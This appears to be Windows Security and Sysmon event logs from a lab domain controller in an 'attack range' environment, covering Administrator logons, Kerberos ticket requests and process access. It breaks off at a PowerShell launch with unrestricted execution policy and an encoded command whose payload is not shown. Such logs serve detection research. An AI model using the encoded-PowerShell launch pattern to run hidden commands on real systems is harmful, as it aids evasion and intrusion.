{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220552,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x795A2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x795a2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220553,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220554,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220555,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220556,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79895\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79895","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220557,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79895\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x79895","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4808,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010CA980700}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010CA980700}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.783\r\nProcessGuid: {A837DB8D-0323-5F25-0000-00109D990700}\r\nProcessId: 3260\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 